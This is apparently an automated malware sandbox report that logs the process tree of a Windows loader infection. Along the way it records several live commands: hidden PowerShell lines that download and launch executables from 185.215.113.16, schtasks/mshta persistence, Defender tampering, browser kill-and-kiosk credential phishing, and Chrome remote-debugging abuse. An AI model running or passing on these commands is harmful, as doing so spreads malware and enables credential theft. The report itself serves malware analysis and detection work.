wrote to memory of 2328 2352 cmd.exe 48 PID 2352 wrote to memory of 2328 2352 cmd.exe 48 PID 2328 wrote to memory of 1728 2328 cmd.exe 49 PID 2328 wrote to memory of 1728 2328 cmd.exe 49 PID 2328 wrote to memory of 1728 2328 cmd.exe 49 PID 2328 wrote to memory of 1728 2328 cmd.exe 49 PID 2352 wrote to memory of 2392 2352 cmd.exe 50 PID 2352 wrote to memory of 2392 2352 cmd.exe 50 PID 2352 wrote to memory of 2392 2352 cmd.exe 50 PID 2352 wrote to memory of 2392 2352 cmd.exe 50 PID 2392 wrote to memory of 2452 2392 cmd.exe 51 PID 2392 wrote to memory of 2452 2392 cmd.exe 51 PID 2392 wrote to memory of 2452 2392 cmd.exe 51 PID 2392 wrote to memory of 2452 2392 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe"C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\1085971101\1c37375b51.exe"C:\Users\Admin\AppData\Local\Temp\1085971101\1c37375b51.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn dgpxMma7zlP /tr "mshta C:\Users\Admin\AppData\Local\Temp\aq6r2ej3K.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn dgpxMma7zlP /tr "mshta C:\Users\Admin\AppData\Local\Temp\aq6r2ej3K.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2948
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\aq6r2ej3K.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Users\Admin\AppData\Local\TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE"C:\Users\Admin\AppData\Local\TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085972021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Jk4ZEmacWEt" /tr "mshta \"C:\Temp\jvP1Kl6ZL.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1060
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\jvP1Kl6ZL.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1416
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086006001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\10007520101\f97a89268c.exe"C:\Users\Admin\AppData\Local\Temp\10007520101\f97a89268c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:288 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2036
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1940 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.0.2100528036\978365562" -parentBuildID 20221007134813 -prefsHandle 1228 -prefMapHandle 1092 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75c939d2-41eb-4d81-aac9-11a28c558497} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 1340 fed8f58 gpu8⤵PID:1784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.1.1330929433\585928152" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f985aaa4-a489-47f8-98b5-d70355d2ee1a} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 1544 42ed758 socket8⤵PID:1540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.2.294112658\928239339" -childID 1 -isForBrowser -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acff04af-13ed-4f08-8e93-47f51a032f4c} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 2264 170d9858 tab8⤵PID:1672
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.3.1939654534\574930110" -childID 2 -isForBrowser -prefsHandle 744 -prefMapHandle 540 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {41428b7d-b140-4391-b0e0-29ce9293e350} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 2632 1bdf9b58 tab8⤵PID:2692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.4.896355152\1105986779" -childID 3 -isForBrowser -prefsHandle 3828 -prefMapHandle 3624 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eb2ef28-8333-48ef-bc0e-b0875f9ef523} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 3840 1b69af58 tab8⤵PID:2076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.5.1619202187\870186163" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdd56383-e821-46ca-b42c-0f1ffb0ae8a1} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 3936 21f51258 tab8⤵PID:1140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1940.6.1033531816\869065416" -childID 5 -isForBrowser -prefsHandle 4044 -prefMapHandle 4048 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7992e813-ad25-4c75-b7dd-872ec95f477e} 1940 "\\.\pipe\gecko-crash-server-pipe.1940" 4032 21f52458 tab8⤵PID:2992
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10007530101\a9b80795c6.exe"C:\Users\Admin\AppData\Local\Temp\10007530101\a9b80795c6.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3564 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2912
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086048001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 5804⤵
- Loads dropped DLL
- Program crash
PID:2928
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086049041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086050001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 5724⤵
- Loads dropped DLL
- Program crash
PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086051001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2636 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3492 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4b89758,0x7fef4b89768,0x7fef4b897786⤵PID:3504
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:26⤵PID:3788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1464 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:86⤵PID:3804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1524 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:86⤵PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1512 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:4092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1468 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1732 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:26⤵PID:1548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1436 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1420 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:86⤵PID:3228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3596 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:86⤵PID:3220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2788 --field-trial-handle=1136,i,11851001113559812472,10317944184931104216,131072 /prefetch:86⤵PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\trieu" & exit5⤵PID:4088
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3928
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 5644⤵
- Loads dropped DLL
- Program crash
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086052001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
-
C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086053001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1364⤵
- Loads dropped DLL
- Program crash
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086055001\f6ed024c22.exe"C:\Users\Admin\AppData\Local\Temp\1086055001\f6ed024c22.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\1086056001\630ddb0de3.exe"C:\Users\Admin\AppData\Local\Temp\1086056001\630ddb0de3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3372 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086057001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1086058001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:3380
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086060001\aadc92ce82.exe"C:\Users\Admin\AppData\Local\Temp\1086060001\aadc92ce82.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3456 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086061001\8e8b499a39.exe"C:\Users\Admin\AppData\Local\Temp\1086061001\8e8b499a39.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4060 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3608
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086062001\594ce90f45.exe"C:\Users\Admin\AppData\Local\Temp\1086062001\594ce90f45.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3700
-
-
